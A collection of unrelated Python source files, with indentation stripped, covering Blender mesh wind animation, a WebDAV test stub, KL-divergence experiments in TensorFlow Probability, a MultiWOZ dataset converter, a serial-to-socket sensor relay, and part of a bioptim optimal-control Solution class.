pos[2] += math.sin(timeN*25) * vcolor[3] * noiseAmmount[2] * vcolor[2] * windNoise[1]
pos[0] += math.sin(timeN*20) * vcolor[3] * noiseAmmount[0] * vcolor[0] * windNoise[0]
pos[0] += math.sin(timeN*15) * vcolor[3] * noiseAmmount[0] * vcolor[1] * windNoise[0]
pos[0] += math.sin(timeN*25) * vcolor[3] * noiseAmmount[0] * vcolor[2] * windNoise[0]
pos[1] += windNoise[0] * noiseAmmount[1] * vcolor[3] * vcolor[0]
pos[1] += windNoise[1] * noiseAmmount[1] * vcolor[3] * vcolor[1]
pos[1] += windNoise[2] * noiseAmmount[1] * vcolor[3] * vcolor[2]
return pos
def preFrameChange(scene):
global Context
timeN=timeNow()
Context["running"]=True
Context["lasttick"]=timeNow()
if Context["starttime"]==-1:
Context["starttime"]=Context["lasttick"]
noiseAmmount=(1,1,1)
timeN=Context["lasttick"]-Context["starttime"]
if not "cols" in Context:
Context["cols"]={}
if bpy.ops.object.mode_set.poll():
for obj in bpy.context.scene.objects:
if obj.select_get():
if not obj in Context["store"]:
Context["store"][obj]={}
if not obj in Context["cols"]:
Context["cols"][obj]={}
src_mesh=obj.data
for i, poly in enumerate(src_mesh.polygons):
for k in poly.loop_indices:
vl = src_mesh.loops[k]
index=vl.vertex_index
if src_mesh.vertex_colors.active:
c=[]
c.extend(src_mesh.vertex_colors.active.data[k].color)
c.append(1.0)
Context["cols"][obj][index]=c
bpy.ops.object.mode_set(mode='EDIT')
mesh = bmesh.from_edit_mesh(obj.data)
for vert in mesh.verts:
if not vert.index in Context["store"][obj]:
v=[]
v.append(vert.co[0])
v.append(vert.co[1])
v.append(vert.co[2])
Context["store"][obj][vert.index]=v
#print("Store "+str(vert.index)+str(v))
col=Context["cols"][obj][vert.index] if vert.index in Context["cols"][obj] else None
vert.co=wind(vert,tuple(Context["store"][obj][vert.index]),col,noiseAmmount,timeN)
bmesh.update_edit_mesh(obj.data)
bpy.ops.object.mode_set(mode='OBJECT')
def resetAnim():
global Context
if Context["running"]:
dtime=timeNow()-Context["lasttick"]
frametime2=calcFrameTime()*2
if dtime > frametime2:
print("Reset Now")
for obj in bpy.context.scene.objects:
if obj in Context["store"]:
bpy.ops.object.mode_set(mode='EDIT')
mesh = bmesh.from_edit_mesh(obj.data)
for vert in mesh.verts:
if vert.index in Context["store"][obj]:
v=Context["store"][obj][vert.index]
#print("Reset "+str(vert.index)+" to "+str(v))
vert.co=v
bmesh.update_edit_mesh(obj.data)
bpy.ops.object.mode_set(mode='OBJECT')
del Context["store"][obj]
Context["running"]=False
del Context["cols"]
delay=calcFrameTime()
return delay
class ModalTimerOperator(bpy.types.Operator):
bl_idname = "wm.modal_timer_operator"
bl_label = "Modal Timer Operator"
_timer = None
def modal(self, context, event):
if event.type in {'RIGHTMOUSE', 'ESC'}:
self.cancel(context)
return {'CANCELLED'}
if event.type == 'TIMER':
resetAnim()
return {'PASS_THROUGH'}
def execute(self, context):
wm = context.window_manager
self._timer = wm.event_timer_add(calcFrameTime(), window=context.window)
wm.modal_handler_add(self)
return {'RUNNING_MODAL'}
def cancel(self, context):
wm = context.window_manager
wm.event_timer_remove(self._timer)
def register():
bpy.app.handlers.frame_change_pre.append(preFrameChange)
bpy.utils.register_class(ModalTimerOperator)
def unregister():
bpy.app.handlers.frame_change_pre.remove(preFrameChange)
register()
bpy.ops.wm.modal_timer_operator()
|
python
|
# -*- coding: utf-8 -*-
import os
from .. import StorageTests, get_server_mixin
dav_server = os.environ.get('DAV_SERVER', 'skip')
ServerMixin = get_server_mixin(dav_server)
class DAVStorageTests(ServerMixin, StorageTests):
dav_server = dav_server
|
python
|
from __future__ import absolute_import, division, print_function
import os
import time
import numpy as np
import seaborn as sns
import tensorflow as tf
import tensorflow_probability as tfp
from matplotlib import pyplot as plt
from tensorflow import keras
from odin import visual as vs
from odin.bay import kl_divergence
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'
tf.random.set_seed(8)
np.random.seed(8)
sns.set()
# ===========================================================================
# Helper functions
# ===========================================================================
def minimize(loss_func,
params,
verbose=False,
print_params=True,
learning_rate=0.1,
epochs=500):
opt = tf.optimizers.Adam(learning_rate=learning_rate)
benchmark = []
history = []
for i in range(epochs):
start_time = time.time()
with tf.GradientTape() as tape:
tape.watch(params)
loss = tf.reduce_mean(loss_func())
grad = tape.gradient(loss, params)
benchmark.append(time.time() - start_time)
if verbose and (i + 1) % (epochs // 2) == 0:
print("#%-4d Loss:%.4f (%.2f sec/100)" %
(i + 1, loss, np.mean(benchmark) * 100))
if print_params:
for p in params:
print(' * %s: %s' % (p.name, str(p.numpy())))
history.append([loss.numpy()] + [p.numpy() for p in params])
opt.apply_gradients(grads_and_vars=zip(grad, params))
return history
create_posterior = lambda: tfp.distributions.Normal(
loc=tf.Variable(0., dtype='float32', trainable=True, name='loc'),
scale=tf.Variable(1., dtype='float32', trainable=True, name='scale'),
name='Normal')
# NOTE: it important to get the loc spread wide enough to prevent mode collapse
# however, the scale must be small enough for not exploding the gradients
create_mixture_posterior = lambda n, loc_min=0, loc_max=100: \
tfp.distributions.MixtureSameFamily(
mixture_distribution=tfp.distributions.Categorical(probs=[1. / n] * n),
components_distribution=tfp.distributions.Normal(
loc=tf.Variable(
np.linspace(loc_min, loc_max, n),
dtype='float32', trainable=True, name='loc'),
scale=tf.Variable(
[1.] * n, dtype='float32', trainable=True, name='scale')))
def plot_posteriors(posterior, prior, n=1000):
# this is very hard-coded function
plt.figure(figsize=(12, 8))
sns.kdeplot(prior.sample(int(n)).numpy(), label="Prior")
for post, analytic, reverse, sample_shape in posterior:
sns.kdeplot(post.sample(int(n)).numpy(),
linestyle='-' if reverse else '--',
label='%s-%s mcmc:%d' % ('KL(q||p)' if reverse else 'KL(p||q)',
'A' if analytic else 'S', sample_shape))
def plot_histories(posterior, histories):
plt.figure(figsize=(24, 5))
for idx, (post, analytic, reverse, sample_shape) in enumerate(posterior):
ax = plt.subplot(1, len(posterior), idx + 1)
hist = histories[idx]
name = '%s-%s mcmc:%d' % \
('KL(q||p)' if reverse else 'KL(p||q)', 'A' if analytic else 'S', sample_shape)
loc = np.asarray([i[1] for i in hist])
plt.plot(loc, label='loc', linestyle='-' if reverse else '--')
scale = np.asarray([i[2] for i in hist])
plt.plot(scale, label='scale', linestyle='-' if reverse else '--')
plt.legend()
ax = ax.twinx()
plt.plot([i[0] for i in hist], label='loss', color='r')
plt.title(name)
plt.tight_layout()
# ===========================================================================
# Can deep network fix posterior mode collapse due to loc initialization
# * Appropriate learning rate is essential
# * High amount of components help, but not too high
# * Too deep network will make overfitting to the first components.
# * If input features are useless, deep network cannot help
# * maximum likelihood might end up with more modes
# ===========================================================================
prior = tfp.distributions.MixtureSameFamily(
mixture_distribution=tfp.distributions.Categorical(probs=[1.0 / 3] * 3),
components_distribution=tfp.distributions.Normal(loc=[0, 25, 80],
scale=[1, 12, 4]))
n_components = 3
X = np.zeros(shape=(1, n_components)).astype('float32')
X = np.linspace(0, 80, num=n_components, dtype='float32')[None, :]
# X = np.random.rand(1, 3).astype('float32')
outputs = {}
for reverse in (True, False):
loc = keras.Sequential([
keras.layers.Dense(16, activation='relu', input_shape=(n_components,)),
keras.layers.Dense(n_components,
activation='linear',
input_shape=(n_components,)),
])
scale = tf.Variable([1.] * n_components,
dtype='float32',
trainable=True,
name='scale')
history = minimize(lambda: kl_divergence(tfp.distributions.MixtureSameFamily(
mixture_distribution=tfp.distributions.Categorical(
probs=[1. / n_components] * n_components),
components_distribution=tfp.distributions.Normal(loc=loc(X), scale=scale
)),
prior,
reverse=reverse,
q_sample=100),
params=loc.trainable_variables + [scale],
verbose=True,
print_params=False,
learning_rate=0.01,
epochs=1200)
posterior = tfp.distributions.MixtureSameFamily(
mixture_distribution=tfp.distributions.Categorical(
probs=[1. / n_components] * n_components),
components_distribution=tfp.distributions.Normal(loc=loc(X), scale=scale))
outputs[reverse] = [posterior, history]
plt.figure(figsize=(18, 8))
plt.subplot(1, 2, 1)
sns.kdeplot(prior.sample(10000).numpy(), label='Prior')
sns.kdeplot(outputs[True][0].sample(10000).numpy().ravel(),
label='Posterior-KL(q||p)')
sns.kdeplot(outputs[False][0].sample(10000).numpy().ravel(),
label='Posterior-KL(p||q)',
linestyle='--')
plt.legend()
ax = plt.subplot(1, 2, 2)
l1 = plt.plot([i[0] for i in outputs[True][1]], label='KL(q||p)')
ax.twinx()
l2 = plt.plot([i[0] for i in outputs[False][1]],
label='KL(p||q)',
linestyle='--')
plt.title("KL loss")
plt.legend(handles=[l1[0], l2[0]])
# ===========================================================================
# Mixture with Mixture Posterior
# ===========================================================================
prior = tfp.distributions.MixtureSameFamily(
mixture_distribution=tfp.distributions.Categorical(probs=[1.0 / 3] * 3),
components_distribution=tfp.distributions.Normal(loc=[0, 32, 80],
scale=[1, 12, 4]))
for n in [2, 3, 5]:
# analytic, reverse, nmcmc
posterior = [
(create_mixture_posterior(n=n), False, True, 1),
(create_mixture_posterior(n=n), False, False, 1),
(create_mixture_posterior(n=n), False, True, 100),
(create_mixture_posterior(n=n), False, False, 100),
]
histories = []
for post, analytic, reverse, sample_shape in posterior:
print("Training:", analytic, reverse, sample_shape)
h = minimize(lambda: kl_divergence(
q=post, p=prior, analytic=analytic, reverse=reverse, q_sample=sample_shape), [
post.components_distribution.loc, post.components_distribution.scale
],
verbose=False)
histories.append(h)
# for more complicated distribution, need more samples
plot_posteriors(posterior, prior, n=10000)
plt.title("Prior:3-mixture Posterior:%d-mixture" % n)
plot_histories(posterior, histories)
vs.plot_save()
exit()
# ===========================================================================
# Mixture with Normal Posterior
# ===========================================================================
prior = tfp.distributions.MixtureSameFamily(
mixture_distribution=tfp.distributions.Categorical(probs=[0.5, 0.5]),
components_distribution=tfp.distributions.Normal(loc=[2, 20], scale=[1, 4]))
posterior = [
(create_posterior(), False, True, 1), # analytic, reverse, nmcmc
(create_posterior(), False, False, 1),
(create_posterior(), False, True, 100),
(create_posterior(), False, False, 100),
]
histories = []
for post, analytic, reverse, sample_shape in posterior:
print("Training:", analytic, reverse, sample_shape)
h = minimize(lambda: kl_divergence(
q=post, p=prior, analytic=analytic, reverse=reverse, q_sample=sample_shape),
[post.loc, post.scale],
verbose=False)
histories.append(h)
plot_posteriors(posterior, prior)
plt.title("Prior:2-mixture Posterior:Normal")
plot_histories(posterior, histories)
# ===========================================================================
# Simple distribution
# ===========================================================================
prior = tfp.distributions.Normal(loc=8, scale=12)
posterior = [
(create_posterior(), True, True, 1), # analytic, reverse, nmcmc
(create_posterior(), True, False, 1),
(create_posterior(), False, True, 1),
(create_posterior(), False, True, 100),
(create_posterior(), False, False, 1),
(create_posterior(), False, False, 100)
]
histories = []
for post, analytic, reverse, sample_shape in posterior:
print("Training:", analytic, reverse, sample_shape)
h = minimize(lambda: kl_divergence(
q=post, p=prior, analytic=analytic, reverse=reverse, q_sample=sample_shape),
[post.loc, post.scale],
verbose=False)
histories.append(h)
plot_posteriors(posterior, prior)
plt.title("Prior:Normal Posterior:Normal")
plot_histories(posterior, histories)
|
python
|
"""Script to convert MultiWOZ 2.2 from SGD format to MultiWOZ format."""
import glob
import json
import os
from absl import app
from absl import flags
from absl import logging
FLAGS = flags.FLAGS
flags.DEFINE_string("multiwoz21_data_dir", None,
"Path of the MultiWOZ 2.1 dataset.")
flags.DEFINE_string("output_file", None, "Output file path in MultiWOZ format.")
_UNTRACKED_SLOTS = frozenset({
"taxi-bookphone", "train-booktrainid", "taxi-booktype",
"restaurant-bookreference", "hospital-bookreference", "hotel-bookreference",
"train-bookreference", "hospital-booktime"
})
_DIR_PATH = os.path.dirname(os.path.abspath(__file__))
flags.mark_flags_as_required(["multiwoz21_data_dir", "output_file"])
def get_slot_name(slot_name, service_name, in_book_field=False):
"""Get the slot name that is consistent with the schema file."""
slot_name = ("book" + slot_name if in_book_field and slot_name != "department"
and slot_name != "name" else slot_name)
return "-".join([service_name, slot_name]).lower()
def format_states(groundtruth_states, states_to_correct):
"""Correct the dialogue states in place."""
for domain_name, values in states_to_correct.items():
for k, v in values["book"].items():
if isinstance(v, list):
for item_dict in v:
for slot_name in item_dict:
new_slot_name = get_slot_name(
slot_name, domain_name, in_book_field=True)
if new_slot_name in _UNTRACKED_SLOTS:
continue
# For the tracked slots, correct their states.
if new_slot_name in groundtruth_states:
item_dict[slot_name] = groundtruth_states[new_slot_name]
else:
item_dict[slot_name] = []
if isinstance(v, str):
slot_name = get_slot_name(k, domain_name, in_book_field=True)
if slot_name in _UNTRACKED_SLOTS:
continue
if slot_name in groundtruth_states:
values["book"][k] = groundtruth_states[slot_name]
else:
values["book"][k] = []
for slot_name in values["semi"]:
new_slot_name = get_slot_name(slot_name, domain_name)
# All the slots in "semi" are tracked.
if new_slot_name in groundtruth_states:
values["semi"][slot_name] = groundtruth_states[new_slot_name]
else:
values["semi"][slot_name] = []
def main(argv):
data_path = os.path.join(FLAGS.multiwoz21_data_dir, "data.json")
with open(data_path, "r") as f:
multiwoz_data = json.load(f)
file_pattern = os.path.join(_DIR_PATH, "*/dialogues_*.json")
files = glob.glob(file_pattern)
clean_data = {}
for file_name in files:
with open(file_name, "r") as f:
dialogues = json.load(f)
for dialogue in dialogues:
clean_data[dialogue["dialogue_id"]] = dialogue
# Load action file.
action_file = os.path.join(_DIR_PATH, "dialog_acts.json")
with open(action_file, "r") as f:
action_data = json.load(f)
dialogue_ids = list(multiwoz_data.keys())
for dialogue_id in dialogue_ids:
dialogue = multiwoz_data[dialogue_id]["log"]
if dialogue_id not in clean_data:
logging.info("Dialogue %s doesn't exist in MultiWOZ 2.2.", dialogue_id)
del multiwoz_data[dialogue_id]
continue
clean_dialogue = clean_data[dialogue_id]
for i, turn in enumerate(dialogue):
# Update the utterance.
turn["text"] = clean_dialogue["turns"][i]["utterance"]
dialog_act = {}
span_info = []
if str(i) in action_data[dialogue_id]:
dialog_act = action_data[dialogue_id][str(i)]["dialog_act"]
span_info = action_data[dialogue_id][str(i)]["span_info"]
turn["dialog_act"] = dialog_act
turn["span_info"] = span_info
# Skip user turns because states are written in the system turns.
if i % 2 == 0:
continue
clean_states = {}
for frame in clean_dialogue["turns"][i - 1]["frames"]:
clean_states.update(frame["state"]["slot_values"])
format_states(clean_states, turn["metadata"])
with open(FLAGS.output_file, "w") as f:
json.dump(multiwoz_data, f, indent=2, separators=(",", ": "), sort_keys=True)
logging.info("Finish writing %d dialogues", len(multiwoz_data))
if __name__ == "__main__":
app.run(main)
|
python
|
#SENSOR_DATA_TRANSFER
import socket
import serial
host = "192.168.137.54"
port = 50007
import time
mySocket = socket.socket()
mySocket.bind((host,port))
mySocket.listen(1)
conn, addr = mySocket.accept()
print ("Connection from: " + str(addr))
aD=serial.Serial('/dev/ttyACM0',9600)
while True:
while (aD.inWaiting()==0):
pass
try:
astring=str(aD.readline())
#astring=str(aD.readline())
astring=astring[2:]
astring=astring[:-5]
'''data = conn.recv(1024).decode()
if not data:
break
print ("from connected user: " + str(data))'''
#data = str(data).upper()
#print ("sending: " + str(data))
conn.send(astring.encode())
time.sleep(0.09)
except:
pass
conn.close()
|
python
|
import time
from typing import Any, Union
from copy import deepcopy
import biorbd_casadi as biorbd
import numpy as np
from scipy import interpolate as sci_interp
from scipy.integrate import solve_ivp
from casadi import vertcat, DM, Function
from matplotlib import pyplot as plt
from ..dynamics.ode_solver import OdeSolver
from ..limits.path_conditions import InitialGuess, InitialGuessList
from ..misc.enums import ControlType, CostType, Shooting, InterpolationType, Solver
from ..misc.utils import check_version
from ..optimization.non_linear_program import NonLinearProgram
from ..optimization.optimization_variable import OptimizationVariableList, OptimizationVariable
class Solution:
"""
Data manipulation, graphing and storage
Attributes
----------
ocp: SimplifiedOCP
The OCP simplified
ns: list
The number of shooting point for each phase
is_interpolated: bool
If the current structure is interpolated
is_integrated: bool
If the current structure is integrated
is_merged: bool
If the phases were merged
vector: np.ndarray
The data in the vector format
_cost: float
The value of the cost function
constraints: list
The values of the constraint
lam_g: list
The Lagrange multiplier of the constraints
lam_p: list
The Lagrange multiplier of the parameters
lam_x: list
The Lagrange multiplier of the states and controls
inf_pr: list
The unscaled constraint violation at each iteration
inf_du: list
The scaled dual infeasibility at each iteration
solver_time_to_optimize: float
The total time to solve the program
iterations: int
The number of iterations that were required to solve the program
status: int
Optimization success status (Ipopt: 0=Succeeded, 1=Failed)
_states: list
The data structure that holds the states
_controls: list
The data structure that holds the controls
parameters: dict
The data structure that holds the parameters
phase_time: list
The total time for each phases
Methods
-------
copy(self, skip_data: bool = False) -> Any
Create a deepcopy of the Solution
@property
states(self) -> Union[list, dict]
Returns the state in list if more than one phases, otherwise it returns the only dict
@property
controls(self) -> Union[list, dict]
Returns the controls in list if more than one phases, otherwise it returns the only dict
integrate(self, shooting_type: Shooting = Shooting.MULTIPLE, keep_intermediate_points: bool = True,
merge_phases: bool = False, continuous: bool = True) -> Solution
Integrate the states
interpolate(self, n_frames: Union[int, list, tuple]) -> Solution
Interpolate the states
merge_phases(self) -> Solution
Get a data structure where all the phases are merged into one
_merge_phases(self, skip_states: bool = False, skip_controls: bool = False) -> tuple
Actually performing the phase merging
_complete_control(self)
Controls don't necessarily have dimensions that matches the states. This method aligns them
graphs(self, automatically_organize: bool, show_bounds: bool,
show_now: bool, shooting_type: Shooting)
Show the graphs of the simulation
animate(self, n_frames: int = 0, show_now: bool = True, **kwargs: Any) -> Union[None, list]
Animate the simulation
print(self, cost_type: CostType = CostType.ALL)
Print the objective functions and/or constraints to the console
"""
class SimplifiedOptimizationVariable:
"""
Simplified version of OptimizationVariable (compatible with pickle)
"""
def __init__(self, other: OptimizationVariable):
self.name = other.name
self.index = other.index
self.mapping = other.mapping
def __len__(self):
return len(self.index)
class SimplifiedOptimizationVariableList:
"""
Simplified version of OptimizationVariableList (compatible with pickle)
"""
def __init__(self, other: Union[OptimizationVariableList]):
self.elements = []
if isinstance(other, Solution.SimplifiedOptimizationVariableList):
self.shape = other.shape
else:
self.shape = other.cx.shape[0]
for elt in other:
self.append(other[elt])
def __getitem__(self, item):
if isinstance(item, int):
return self.elements[item]
elif isinstance(item, str):
for elt in self.elements:
if item == elt.name:
return elt
raise KeyError(f"{item} is not in the list")
else:
raise ValueError("OptimizationVariableList can be sliced with int or str only")
def append(self, other: OptimizationVariable):
self.elements.append(Solution.SimplifiedOptimizationVariable(other))
def __contains__(self, item):
for elt in self.elements:
if item == elt.name:
return True
else:
return False
def keys(self):
return [elt.name for elt in self]
def __len__(self):
return len(self.elements)
def __iter__(self):
self._iter_idx = 0
return self
def __next__(self):
self._iter_idx += 1
if self._iter_idx > len(self):
raise StopIteration
return self[self._iter_idx - 1].name
class SimplifiedNLP:
"""
A simplified version of the NonLinearProgram structure (compatible with pickle)
Attributes
----------
control_type: ControlType
The control type for the current nlp
dynamics: list[ODE_SOLVER]
All the dynamics for each of the node of the phase
g: list[list[Constraint]]
All the constraints at each of the node of the phase
J: list[list[Objective]]
All the objectives at each of the node of the phase
model: biorbd.Model
A reference to the biorbd Model
variable_mappings: dict
All the BiMapping of the states and controls
ode_solver: OdeSolverBase
The number of finite element of the RK
ns: int
The number of shooting points
"""
def __init__(self, nlp: NonLinearProgram):
"""
Parameters
----------
nlp: NonLinearProgram
A reference to the NonLinearProgram to strip
"""
self.phase_idx = nlp.phase_idx
self.model = nlp.model
self.states = Solution.SimplifiedOptimizationVariableList(nlp.states)
self.controls = Solution.SimplifiedOptimizationVariableList(nlp.controls)
self.dynamics = nlp.dynamics
self.dynamics_func = nlp.dynamics_func
self.ode_solver = nlp.ode_solver
self.variable_mappings = nlp.variable_mappings
self.control_type = nlp.control_type
self.J = nlp.J
self.J_internal = nlp.J_internal
self.g = nlp.g
self.g_internal = nlp.g_internal
self.ns = nlp.ns
self.parameters = nlp.parameters
class SimplifiedOCP:
"""
A simplified version of the NonLinearProgram structure (compatible with pickle)
Attributes
----------
g: list
Constraints that are not phase dependent (mostly parameters and continuity constraints)
J: list
Objective values that are not phase dependent (mostly parameters)
nlp: NLP
All the phases of the ocp
phase_transitions: list[PhaseTransition]
The list of transition constraint between phases
prepare_plots: Callable
The function to call to prepare the PlotOCP
v: OptimizationVector
The variable optimization holder
"""
def __init__(self, ocp):
"""
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp to strip
"""
self.nlp = [Solution.SimplifiedNLP(nlp) for nlp in ocp.nlp]
self.v = ocp.v
self.J = ocp.J
self.J_internal = ocp.J_internal
self.g = ocp.g
self.g_internal = ocp.g_internal
self.phase_transitions = ocp.phase_transitions
self.prepare_plots = ocp.prepare_plots
def __init__(self, ocp, sol: Union[dict, list, tuple, np.ndarray, DM, None]):
"""
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp to strip
sol: Union[dict, list, tuple, np.ndarray, DM]
The values of a solution
"""
self.ocp = Solution.SimplifiedOCP(ocp) if ocp else None
self.ns = [nlp.ns for nlp in self.ocp.nlp]
# Current internal state of the data
self.is_interpolated = False
self.is_integrated = False
self.is_merged = False
self.recomputed_time_steps = False
self.vector = None
self._cost = None
self.constraints = None
self.lam_g = None
self.lam_p = None
self.lam_x = None
self.inf_pr = None
self.inf_du = None
self.solver_time_to_optimize = None
self.real_time_to_optimize = None
self.iterations = None
self.status = None
# Extract the data now for further use
self._states, self._controls, self.parameters = {}, {}, {}
self.phase_time = []
def init_from_dict(_sol: dict):
"""
Initialize all the attributes from an Ipopt-like dictionary data structure
Parameters
----------
_sol: dict
The solution in a Ipopt-like dictionary
"""
self.vector = _sol["x"]
if _sol["solver"] == Solver.IPOPT:
self._cost = _sol["f"]
self.constraints = _sol["g"]
self.lam_g = _sol["lam_g"]
self.lam_p = _sol["lam_p"]
self.lam_x = _sol["lam_x"]
self.inf_pr = _sol["inf_pr"]
self.inf_du = _sol["inf_du"]
self.solver_time_to_optimize = _sol["solver_time_to_optimize"]
self.real_time_to_optimize = _sol["real_time_to_optimize"]
self.iterations = _sol["iter"]
self.status = _sol["status"]
# Extract the data now for further use
self._states, self._controls, self.parameters = self.ocp.v.to_dictionaries(self.vector)
self._complete_control()
self.phase_time = self.ocp.v.extract_phase_time(self.vector)
def init_from_initial_guess(_sol: list):
"""
Initialize all the attributes from a list of initial guesses (states, controls)
Parameters
----------
_sol: list
The list of initial guesses
"""
n_param = len(ocp.v.parameters_in_list)
# Sanity checks
for i in range(len(_sol)): # Convert to list if necessary and copy for as many phases there are
if isinstance(_sol[i], InitialGuess):
tp = InitialGuessList()
for _ in range(len(self.ns)):
tp.add(deepcopy(_sol[i].init), interpolation=_sol[i].init.type)
_sol[i] = tp
if sum([isinstance(s, InitialGuessList) for s in _sol]) != 2:
raise ValueError(
"solution must be a solution dict, "
"an InitialGuess[List] of len 2 or 3 (states, controls, parameters), "
"or a None"
)
if sum([len(s) != len(self.ns) if p != 3 else False for p, s in enumerate(_sol)]) != 0:
raise ValueError("The InitialGuessList len must match the number of phases")
if n_param != 0:
if len(_sol) != 3 and len(_sol[2]) != 1 and _sol[2][0].shape != (n_param, 1):
raise ValueError(
"The 3rd element is the InitialGuess of the parameter and "
"should be a unique vector of size equal to n_param"
)
self.vector = np.ndarray((0, 1))
sol_states, sol_controls = _sol[0], _sol[1]
for p, s in enumerate(sol_states):
ns = self.ocp.nlp[p].ns + 1 if s.init.type != InterpolationType.EACH_FRAME else self.ocp.nlp[p].ns
s.init.check_and_adjust_dimensions(self.ocp.nlp[p].states.shape, ns, "states")
for i in range(self.ns[p] + 1):
self.vector = np.concatenate((self.vector, s.init.evaluate_at(i)[:, np.newaxis]))
for p, s in enumerate(sol_controls):
control_type = self.ocp.nlp[p].control_type
if control_type == ControlType.CONSTANT:
off = 0
elif control_type == ControlType.LINEAR_CONTINUOUS:
off = 1
else:
raise NotImplementedError(f"control_type {control_type} is not implemented in Solution")
s.init.check_and_adjust_dimensions(self.ocp.nlp[p].controls.shape, self.ns[p], "controls")
for i in range(self.ns[p] + off):
self.vector = np.concatenate((self.vector, s.init.evaluate_at(i)[:, np.newaxis]))
if n_param:
sol_params = _sol[2]
for p, s in enumerate(sol_params):
self.vector = np.concatenate((self.vector, np.repeat(s.init, self.ns[p] + 1)[:, np.newaxis]))
self._states, self._controls, self.parameters = self.ocp.v.to_dictionaries(self.vector)
self._complete_control()
self.phase_time = self.ocp.v.extract_phase_time(self.vector)
def init_from_vector(_sol: Union[np.ndarray, DM]):
"""
Initialize all the attributes from a vector of solution
Parameters
----------
_sol: Union[np.ndarray, DM]
The solution in vector format
"""
self.vector = _sol
self._states, self._controls, self.parameters = self.ocp.v.to_dictionaries(self.vector)
self._complete_control()
self.phase_time = self.ocp.v.extract_phase_time(self.vector)
if isinstance(sol, dict):
init_from_dict(sol)
elif isinstance(sol, (list, tuple)) and len(sol) in (2, 3):
init_from_initial_guess(sol)
elif isinstance(sol, (np.ndarray, DM)):
init_from_vector(sol)
elif sol is None:
self.ns = []
else:
raise ValueError("Solution called with unknown initializer")
@property
def cost(self):
if self._cost is None:
self._cost = 0
for J in self.ocp.J:
_, val_weighted = self._get_penalty_cost(None, J)
self._cost += val_weighted
for idx_phase, nlp in enumerate(self.ocp.nlp):
for J in nlp.J:
_, val_weighted = self._get_penalty_cost(nlp, J)
self._cost += val_weighted
return self._cost
def copy(self, skip_data: bool = False) -> Any:
"""
Create a deepcopy of the Solution
Parameters
----------
skip_data: bool
If data should be ignored in the copy
Returns
-------
Return a Solution data structure
"""
new = Solution(self.ocp, None)
new.vector = deepcopy(self.vector)
new._cost = deepcopy(self._cost)
new.constraints = deepcopy(self.constraints)
new.lam_g = deepcopy(self.lam_g)
new.lam_p = deepcopy(self.lam_p)
new.lam_x = deepcopy(self.lam_x)
new.inf_pr = deepcopy(self.inf_pr)
new.inf_du = deepcopy(self.inf_du)
new.solver_time_to_optimize = deepcopy(self.solver_time_to_optimize)
new.real_time_to_optimize = deepcopy(self.real_time_to_optimize)
new.iterations = deepcopy(self.iterations)
new.is_interpolated = deepcopy(self.is_interpolated)
new.is_integrated = deepcopy(self.is_integrated)
new.is_merged = deepcopy(self.is_merged)
new.phase_time = deepcopy(self.phase_time)
new.ns = deepcopy(self.ns)
if skip_data:
new._states, new._controls, new.parameters = [], [], {}
else:
new._states = deepcopy(self._states)
new._controls = deepcopy(self._controls)
new.parameters = deepcopy(self.parameters)
return new
@property
def states(self) -> Union[list, dict]:
"""
Returns the state in list if more than one phases, otherwise it returns the only dict
Returns
-------
The states data
"""
return self._states[0] if len(self._states) == 1 else self._states
@property
def controls(self) -> Union[list, dict]:
"""
Returns the controls in list if more than one phases, otherwise it returns the only dict
Returns
-------
The controls data
"""
if not self._controls:
raise RuntimeError(
"There is no controls in the solution. "
"This may happen in "
"previously integrated and interpolated structure"
)
return self._controls[0] if len(self._controls) == 1 else self._controls
def integrate(
self,
shooting_type: Shooting = Shooting.SINGLE_CONTINUOUS,
keep_intermediate_points: bool = False,
merge_phases: bool = False,
continuous: bool = True,
use_scipy_integrator: bool = False,
) -> Any:
"""
Integrate the states
Parameters
----------
shooting_type: Shooting
Which type of integration
keep_intermediate_points: bool
If the integration should returns the intermediate values of the integration [False]
or only keep the node [True] effective keeping the initial size of the states
merge_phases: bool
If the phase should be merged in a unique phase
continuous: bool
If the arrival value of a node should be discarded [True] or kept [False]. The value of an integrated
arrival node and the beginning of the next one are expected to be almost equal when the problem converged
use_scipy_integrator: bool
Ignore the dynamics defined by OCP and use an separate integrator provided by scipy
Returns
-------
A Solution data structure with the states integrated. The controls are removed from this structure
"""
# Sanity check
if self.is_integrated:
raise RuntimeError("Cannot integrate twice")
if self.is_interpolated:
raise RuntimeError("Cannot integrate after interpolating")
if self.is_merged:
raise RuntimeError("Cannot integrate after merging phases")
if shooting_type == Shooting.MULTIPLE and not keep_intermediate_points:
raise ValueError(
"Shooting.MULTIPLE and keep_intermediate_points=False cannot be used simultaneously "
"since it would do nothing"
)
if shooting_type == Shooting.SINGLE_CONTINUOUS and not continuous:
raise ValueError(
"Shooting.SINGLE_CONTINUOUS and continuous=False cannot be used simultaneously it is a contradiction"
)
out = self.__perform_integration(shooting_type, keep_intermediate_points, continuous, use_scipy_integrator)
if merge_phases:
if continuous:
out = out.interpolate(sum(out.ns) + 1)
else:
out._states, _, out.phase_time, out.ns = out._merge_phases(skip_controls=True, continuous=continuous)
out.is_merged = True
out.is_integrated = True
return out
def __perform_integration(
self, shooting_type: Shooting, keep_intermediate_points: bool, continuous: bool, use_scipy_integrator: bool
):
n_direct_collocation = sum([nlp.ode_solver.is_direct_collocation for nlp in self.ocp.nlp])
if n_direct_collocation > 0 and not use_scipy_integrator:
if continuous:
raise RuntimeError(
"Integration with direct collocation must be not continuous if not use_scipy_integrator"
)
if shooting_type != Shooting.MULTIPLE:
raise RuntimeError(
"Integration with direct collocation must using shooting_type=Shooting.MULTIPLE "
"if not use_scipy_integrator"
)
# Copy the data
out = self.copy(skip_data=True)
out.recomputed_time_steps = use_scipy_integrator
out._states = []
for _ in range(len(self._states)):
out._states.append({})
params = self.parameters["all"]
x0 = self._states[0]["all"][:, 0]
for p, nlp in enumerate(self.ocp.nlp):
param_scaling = nlp.parameters.scaling
n_states = self._states[p]["all"].shape[0]
n_steps = nlp.ode_solver.steps_scipy if use_scipy_integrator else nlp.ode_solver.steps
if not continuous:
n_steps += 1
if keep_intermediate_points:
out.ns[p] *= n_steps
out._states[p]["all"] = np.ndarray((n_states, out.ns[p] + 1))
# Get the first frame of the phase
if shooting_type == Shooting.SINGLE_CONTINUOUS:
if p != 0:
u0 = self._controls[p - 1]["all"][:, -1]
val = self.ocp.phase_transitions[p - 1].function(vertcat(x0, x0), vertcat(u0, u0), params)
